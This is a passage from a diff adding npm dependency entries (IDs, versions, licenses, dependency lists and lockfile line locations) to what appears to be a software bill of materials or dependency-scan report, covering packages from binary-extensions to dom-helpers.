"MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3654, + "EndLine": 3663 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "binary-extensions@2.3.0", + "Name": "binary-extensions", + "Identifier": { + "PURL": "pkg:npm/binary-extensions@2.3.0", + "UID": "c23068d8ccb59587" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3664, + "EndLine": 3675 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "body-parser@1.20.5", + "Name": "body-parser", + "Identifier": { + "PURL": "pkg:npm/body-parser@1.20.5", + "UID": "f68129b2d92df0fd" + }, + "Version": "1.20.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bytes@3.1.2", + "content-type@1.0.5", + "debug@2.6.9", + "depd@2.0.0", + "destroy@1.2.0", + "http-errors@2.0.1", + "iconv-lite@0.4.24", + "on-finished@2.4.1", + "qs@6.15.1", + "raw-body@2.5.3", + "type-is@1.6.18", + "unpipe@1.0.0" + ], + "Locations": [ + { + "StartLine": 3676, + "EndLine": 3699 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "brace-expansion@2.1.0", + "Name": "brace-expansion", + "Identifier": { + "PURL": "pkg:npm/brace-expansion@2.1.0", + "UID": "af2ab683fa7e5812" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "balanced-match@1.0.2" + ], + "Locations": [ + { + "StartLine": 4732, + "EndLine": 4740 + }, + { + "StartLine": 6502, + "EndLine": 6510 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "braces@3.0.3", + "Name": "braces", + "Identifier": { + "PURL": "pkg:npm/braces@3.0.3", + "UID": "e1f6491de8a2f450" + }, + "Version": "3.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fill-range@7.1.1" + ], + "Locations": [ + { + "StartLine": 3741, + "EndLine": 3752 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "brotli@1.3.3", + "Name": "brotli", + "Identifier": { + "PURL": "pkg:npm/brotli@1.3.3", + "UID": "26b95af40200cc83" + }, + "Version": "1.3.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "base64-js@1.5.1" + ], + "Locations": [ + { + "StartLine": 3753, + "EndLine": 3761 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "browserify-zlib@0.2.0", + "Name": "browserify-zlib", + "Identifier": { + "PURL": "pkg:npm/browserify-zlib@0.2.0", + "UID": "dc9da3279fcef43c" + }, + "Version": "0.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "pako@1.0.11" + ], + "Locations": [ + { + "StartLine": 3762, + "EndLine": 3770 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "browserslist@4.28.2", + "Name": "browserslist", + "Identifier": { + "PURL": "pkg:npm/browserslist@4.28.2", + "UID": "cef81436a67eb5b0" + }, + "Version": "4.28.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "baseline-browser-mapping@2.10.24", + "caniuse-lite@1.0.30001791", + "electron-to-chromium@1.5.345", + "node-releases@2.0.38", + "update-browserslist-db@1.2.3" + ], + "Locations": [ + { + "StartLine": 3771, + "EndLine": 3803 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "buffer-equal-constant-time@1.0.1", + "Name": "buffer-equal-constant-time", + "Identifier": { + "PURL": "pkg:npm/buffer-equal-constant-time@1.0.1", + "UID": "1692094cd9c7b289" + }, + "Version": "1.0.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3804, + "EndLine": 3809 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "buffer-from@1.1.2", + "Name": "buffer-from", + "Identifier": { + "PURL": "pkg:npm/buffer-from@1.1.2", + "UID": "8cde34d04e51064d" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3810, + "EndLine": 3815 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "busboy@1.6.0", + "Name": "busboy", + "Identifier": { + "PURL": "pkg:npm/busboy@1.6.0", + "UID": "3c67ff971c36b1ea" + }, + "Version": "1.6.0", + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "streamsearch@1.1.0" + ], + "Locations": [ + { + "StartLine": 3816, + "EndLine": 3826 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bytes@3.1.2", + "Name": "bytes", + "Identifier": { + "PURL": "pkg:npm/bytes@3.1.2", + "UID": "94e6e1694f740acf" + }, + "Version": "3.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3827, + "EndLine": 3835 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "call-bind-apply-helpers@1.0.2", + "Name": "call-bind-apply-helpers", + "Identifier": { + "PURL": "pkg:npm/call-bind-apply-helpers@1.0.2", + "UID": "f76cf4360b4b99d7" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0", + "function-bind@1.1.2" + ], + "Locations": [ + { + "StartLine": 3846, + "EndLine": 3858 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "call-bound@1.0.4", + "Name": "call-bound", + "Identifier": { + "PURL": "pkg:npm/call-bound@1.0.4", + "UID": "86b0bfd4902ddd17" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bind-apply-helpers@1.0.2", + "get-intrinsic@1.3.0" + ], + "Locations": [ + { + "StartLine": 3859, + "EndLine": 3874 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "camelcase@5.3.1", + "Name": "camelcase", + "Identifier": { + "PURL": "pkg:npm/camelcase@5.3.1", + "UID": "5ddfca2cd8027175" + }, + "Version": "5.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3885, + "EndLine": 3893 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "camelcase-css@2.0.1", + "Name": "camelcase-css", + "Identifier": { + "PURL": "pkg:npm/camelcase-css@2.0.1", + "UID": "56256fd3cc2eb216" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3894, + "EndLine": 3902 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "caniuse-lite@1.0.30001791", + "Name": "caniuse-lite", + "Identifier": { + "PURL": "pkg:npm/caniuse-lite@1.0.30001791", + "UID": "42baa4809cd911d2" + }, + "Version": "1.0.30001791", + "Licenses": [ + "CC-BY-4.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3903, + "EndLine": 3922 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "chokidar@3.6.0", + "Name": "chokidar", + "Identifier": { + "PURL": "pkg:npm/chokidar@3.6.0", + "UID": "355682d72aa1a1bb" + }, + "Version": "3.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "anymatch@3.1.3", + "braces@3.0.3", + "fsevents@2.3.3", + "glob-parent@5.1.2", + "is-binary-path@2.1.0", + "is-glob@4.0.3", + "normalize-path@3.0.0", + "readdirp@3.6.0" + ], + "Locations": [ + { + "StartLine": 3972, + "EndLine": 3995 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "client-only@0.0.1", + "Name": "client-only", + "Identifier": { + "PURL": "pkg:npm/client-only@0.0.1", + "UID": "5a37df37a522d946" + }, + "Version": "0.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4008, + "EndLine": 4013 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cliui@6.0.0", + "Name": "cliui", + "Identifier": { + "PURL": "pkg:npm/cliui@6.0.0", + "UID": "e3fc29e4430367f8" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width@4.2.3", + "strip-ansi@6.0.1", + "wrap-ansi@6.2.0" + ], + "Locations": [ + { + "StartLine": 8170, + "EndLine": 8180 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cliui@8.0.1", + "Name": "cliui", + "Identifier": { + "PURL": "pkg:npm/cliui@8.0.1", + "UID": "44577153b7afd839" + }, + "Version": "8.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width@4.2.3", + "strip-ansi@6.0.1", + "wrap-ansi@7.0.0" + ], + "Locations": [ + { + "StartLine": 4014, + "EndLine": 4028 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "clone@2.1.2", + "Name": "clone", + "Identifier": { + "PURL": "pkg:npm/clone@2.1.2", + "UID": "2ef0e8d413d0a516" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4029, + "EndLine": 4037 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "clsx@2.1.1", + "Name": "clsx", + "Identifier": { + "PURL": "pkg:npm/clsx@2.1.1", + "UID": "860fe62a1599cca6" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4038, + "EndLine": 4046 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cluster-key-slot@1.1.2", + "Name": "cluster-key-slot", + "Identifier": { + "PURL": "pkg:npm/cluster-key-slot@1.1.2", + "UID": "93272ba097484907" + }, + "Version": "1.1.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4047, + "EndLine": 4055 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-convert@2.0.1", + "Name": "color-convert", + "Identifier": { + "PURL": "pkg:npm/color-convert@2.0.1", + "UID": "24820f76ed277f23" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-name@1.1.4" + ], + "Locations": [ + { + "StartLine": 4056, + "EndLine": 4067 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-name@1.1.4", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@1.1.4", + "UID": "92033e7783c5c780" + }, + "Version": "1.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4068, + "EndLine": 4073 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-name@2.1.0", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@2.1.0", + "UID": "6924f70f47532648" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2261, + "EndLine": 2269 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-string@1.9.1", + "Name": "color-string", + "Identifier": { + "PURL": "pkg:npm/color-string@1.9.1", + "UID": "db1d00aa09de81ea" + }, + "Version": "1.9.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-name@1.1.4", + "simple-swizzle@0.2.4" + ], + "Locations": [ + { + "StartLine": 4074, + "EndLine": 4083 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "color-string@2.1.4", + "Name": "color-string", + "Identifier": { + "PURL": "pkg:npm/color-string@2.1.4", + "UID": "8c3f450860129c2d" + }, + "Version": "2.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-name@2.1.0" + ], + "Locations": [ + { + "StartLine": 2270, + "EndLine": 2281 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "combined-stream@1.0.8", + "Name": "combined-stream", + "Identifier": { + "PURL": "pkg:npm/combined-stream@1.0.8", + "UID": "b0b485aae59ec66e" + }, + "Version": "1.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "delayed-stream@1.0.0" + ], + "Locations": [ + { + "StartLine": 4084, + "EndLine": 4095 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "commander@10.0.1", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@10.0.1", + "UID": "65a2448c291b872a" + }, + "Version": "10.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4096, + "EndLine": 4104 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "commander@4.1.1", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@4.1.1", + "UID": "43d1edb4e2424e70" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9382, + "EndLine": 9390 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "concat-stream@1.6.2", + "Name": "concat-stream", + "Identifier": { + "PURL": "pkg:npm/concat-stream@1.6.2", + "UID": "f6eb2808fca671fc" + }, + "Version": "1.6.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "buffer-from@1.1.2", + "inherits@2.0.4", + "readable-stream@2.3.8", + "typedarray@0.0.6" + ], + "Locations": [ + { + "StartLine": 4122, + "EndLine": 4136 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "config-chain@1.1.13", + "Name": "config-chain", + "Identifier": { + "PURL": "pkg:npm/config-chain@1.1.13", + "UID": "b310cec790dc9116" + }, + "Version": "1.1.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ini@1.3.8", + "proto-list@1.2.4" + ], + "Locations": [ + { + "StartLine": 4174, + "EndLine": 4183 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "content-disposition@0.5.4", + "Name": "content-disposition", + "Identifier": { + "PURL": "pkg:npm/content-disposition@0.5.4", + "UID": "9e487feb999d8a3d" + }, + "Version": "0.5.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safe-buffer@5.2.1" + ], + "Locations": [ + { + "StartLine": 4184, + "EndLine": 4195 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "content-type@1.0.5", + "Name": "content-type", + "Identifier": { + "PURL": "pkg:npm/content-type@1.0.5", + "UID": "d306d10a33b29b02" + }, + "Version": "1.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4196, + "EndLine": 4204 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cookie@0.7.2", + "Name": "cookie", + "Identifier": { + "PURL": "pkg:npm/cookie@0.7.2", + "UID": "5801c71e7a6dd0c5" + }, + "Version": "0.7.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4836, + "EndLine": 4844 + }, + { + "StartLine": 5265, + "EndLine": 5273 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cookie-signature@1.0.7", + "Name": "cookie-signature", + "Identifier": { + "PURL": "pkg:npm/cookie-signature@1.0.7", + "UID": "35470ee835f462a5" + }, + "Version": "1.0.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4205, + "EndLine": 4210 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "core-util-is@1.0.3", + "Name": "core-util-is", + "Identifier": { + "PURL": "pkg:npm/core-util-is@1.0.3", + "UID": "105c197829bc7dcd" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4218, + "EndLine": 4223 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cors@2.8.6", + "Name": "cors", + "Identifier": { + "PURL": "pkg:npm/cors@2.8.6", + "UID": "7438c9e56be412ab" + }, + "Version": "2.8.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "object-assign@4.1.1", + "vary@1.1.2" + ], + "Locations": [ + { + "StartLine": 4224, + "EndLine": 4240 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cross-fetch@3.2.0", + "Name": "cross-fetch", + "Identifier": { + "PURL": "pkg:npm/cross-fetch@3.2.0", + "UID": "c4a7db2bdab9da9e" + }, + "Version": "3.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "node-fetch@2.7.0" + ], + "Locations": [ + { + "StartLine": 4248, + "EndLine": 4256 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cross-spawn@7.0.6", + "Name": "cross-spawn", + "Identifier": { + "PURL": "pkg:npm/cross-spawn@7.0.6", + "UID": "3e995dd95c2e6121" + }, + "Version": "7.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "path-key@3.1.1", + "shebang-command@2.0.0", + "which@2.0.2" + ], + "Locations": [ + { + "StartLine": 4257, + "EndLine": 4270 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "crypto-js@4.2.0", + "Name": "crypto-js", + "Identifier": { + "PURL": "pkg:npm/crypto-js@4.2.0", + "UID": "d9e16402827a644b" + }, + "Version": "4.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4271, + "EndLine": 4276 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cssesc@3.0.0", + "Name": "cssesc", + "Identifier": { + "PURL": "pkg:npm/cssesc@3.0.0", + "UID": "e56f53ee90afa116" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4277, + "EndLine": 4288 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "csstype@3.2.3", + "Name": "csstype", + "Identifier": { + "PURL": "pkg:npm/csstype@3.2.3", + "UID": "4898864191c3de45" + }, + "Version": "3.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4289, + "EndLine": 4294 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "d3-array@3.2.4", + "Name": "d3-array", + "Identifier": { + "PURL": "pkg:npm/d3-array@3.2.4", + "UID": "72d6d360076fa8b8" + }, + "Version": "3.2.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "internmap@2.0.3" + ], + "Locations": [ + { + "StartLine": 4295, + "EndLine": 4306 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "d3-color@3.1.0", + "Name": "d3-color", + "Identifier": { + "PURL": "pkg:npm/d3-color@3.1.0", + "UID": "8820c51a30866026" + }, + "Version": "3.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4307, + "EndLine": 4315 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "d3-ease@3.0.1", + "Name": "d3-ease", + "Identifier": { + "PURL": "pkg:npm/d3-ease@3.0.1", + "UID": "547e28baa63d47f9" + }, + "Version": "3.0.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4316, + "EndLine": 4324 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "d3-format@3.1.2", + "Name": "d3-format", + "Identifier": { + "PURL": "pkg:npm/d3-format@3.1.2", + "UID": "157b0878803187d7" + }, + "Version": "3.1.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4325, + "EndLine": 4333 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "d3-interpolate@3.0.1", + "Name": "d3-interpolate", + "Identifier": { + "PURL": "pkg:npm/d3-interpolate@3.0.1", + "UID": "645fae9aed7e1429" + }, + "Version": "3.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "d3-color@3.1.0" + ], + "Locations": [ + { + "StartLine": 4334, + "EndLine": 4345 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "d3-path@3.1.0", + "Name": "d3-path", + "Identifier": { + "PURL": "pkg:npm/d3-path@3.1.0", + "UID": "2f2147e7deeab9bd" + }, + "Version": "3.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4346, + "EndLine": 4354 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "d3-scale@4.0.2", + "Name": "d3-scale", + "Identifier": { + "PURL": "pkg:npm/d3-scale@4.0.2", + "UID": "731b0e1b7b306a72" + }, + "Version": "4.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "d3-array@3.2.4", + "d3-format@3.1.2", + "d3-interpolate@3.0.1", + "d3-time-format@4.1.0", + "d3-time@3.1.0" + ], + "Locations": [ + { + "StartLine": 4355, + "EndLine": 4370 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "d3-shape@3.2.0", + "Name": "d3-shape", + "Identifier": { + "PURL": "pkg:npm/d3-shape@3.2.0", + "UID": "ecf7fcc3ec5d094e" + }, + "Version": "3.2.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "d3-path@3.1.0" + ], + "Locations": [ + { + "StartLine": 4371, + "EndLine": 4382 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "d3-time@3.1.0", + "Name": "d3-time", + "Identifier": { + "PURL": "pkg:npm/d3-time@3.1.0", + "UID": "98f1ac5e86b433b1" + }, + "Version": "3.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "d3-array@3.2.4" + ], + "Locations": [ + { + "StartLine": 4383, + "EndLine": 4394 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "d3-time-format@4.1.0", + "Name": "d3-time-format", + "Identifier": { + "PURL": "pkg:npm/d3-time-format@4.1.0", + "UID": "b46a8cfc90597852" + }, + "Version": "4.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "d3-time@3.1.0" + ], + "Locations": [ + { + "StartLine": 4395, + "EndLine": 4406 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "d3-timer@3.0.1", + "Name": "d3-timer", + "Identifier": { + "PURL": "pkg:npm/d3-timer@3.0.1", + "UID": "1822aabe50289c6e" + }, + "Version": "3.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4407, + "EndLine": 4415 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "dayjs@1.11.20", + "Name": "dayjs", + "Identifier": { + "PURL": "pkg:npm/dayjs@1.11.20", + "UID": "11faa6b4064d7e1b" + }, + "Version": "1.11.20", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4416, + "EndLine": 4421 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "debug@2.6.9", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@2.6.9", + "UID": "2a62687bdb44aadd" + }, + "Version": "2.6.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ms@2.0.0" + ], + "Locations": [ + { + "StartLine": 3700, + "EndLine": 3708 + }, + { + "StartLine": 5274, + "EndLine": 5282 + }, + { + "StartLine": 5477, + "EndLine": 5485 + }, + { + "StartLine": 7133, + "EndLine": 7141 + }, + { + "StartLine": 8828, + "EndLine": 8836 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "debug@4.4.3", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@4.4.3", + "UID": "eeb962d623a91114" + }, + "Version": "4.4.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ms@2.1.3" + ], + "Locations": [ + { + "StartLine": 4422, + "EndLine": 4438 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "decamelize@1.2.0", + "Name": "decamelize", + "Identifier": { + "PURL": "pkg:npm/decamelize@1.2.0", + "UID": "8d8eb0e430561291" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4439, + "EndLine": 4447 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "decimal.js-light@2.5.1", + "Name": "decimal.js-light", + "Identifier": { + "PURL": "pkg:npm/decimal.js-light@2.5.1", + "UID": "48d749d4ec631c7d" + }, + "Version": "2.5.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4448, + "EndLine": 4453 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "deepmerge@4.3.1", + "Name": "deepmerge", + "Identifier": { + "PURL": "pkg:npm/deepmerge@4.3.1", + "UID": "1ea0fc6772831144" + }, + "Version": "4.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4474, + "EndLine": 4482 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "delayed-stream@1.0.0", + "Name": "delayed-stream", + "Identifier": { + "PURL": "pkg:npm/delayed-stream@1.0.0", + "UID": "8d1ac8f51eba9454" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4483, + "EndLine": 4491 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "denque@2.1.0", + "Name": "denque", + "Identifier": { + "PURL": "pkg:npm/denque@2.1.0", + "UID": "8a8ffafa5c393a66" + }, + "Version": "2.1.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4492, + "EndLine": 4500 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "depd@2.0.0", + "Name": "depd", + "Identifier": { + "PURL": "pkg:npm/depd@2.0.0", + "UID": "d019fee3d093740e" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4501, + "EndLine": 4509 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "destroy@1.2.0", + "Name": "destroy", + "Identifier": { + "PURL": "pkg:npm/destroy@1.2.0", + "UID": "4fa54c20c478abef" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4510, + "EndLine": 4519 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "detect-libc@2.1.2", + "Name": "detect-libc", + "Identifier": { + "PURL": "pkg:npm/detect-libc@2.1.2", + "UID": "14592211267c9f49" + }, + "Version": "2.1.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4520, + "EndLine": 4528 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "dfa@1.2.0", + "Name": "dfa", + "Identifier": { + "PURL": "pkg:npm/dfa@1.2.0", + "UID": "197b83c0e692235" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4540, + "EndLine": 4545 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "didyoumean@1.2.2", + "Name": "didyoumean", + "Identifier": { + "PURL": "pkg:npm/didyoumean@1.2.2", + "UID": "af0fffe32ba5a055" + }, + "Version": "1.2.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4546, + "EndLine": 4551 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "dijkstrajs@1.0.3", + "Name": "dijkstrajs", + "Identifier": { + "PURL": "pkg:npm/dijkstrajs@1.0.3", + "UID": "5356e4c4f9eeed18" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4572, + "EndLine": 4577 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "dlv@1.1.3", + "Name": "dlv", + "Identifier": { + "PURL": "pkg:npm/dlv@1.1.3", + "UID": "515b067cc4ac9f8e" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4578, + "EndLine": 4583 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "dom-helpers@5.2.1", + "Name": "dom-helpers", + "Identifier": { + "PURL": 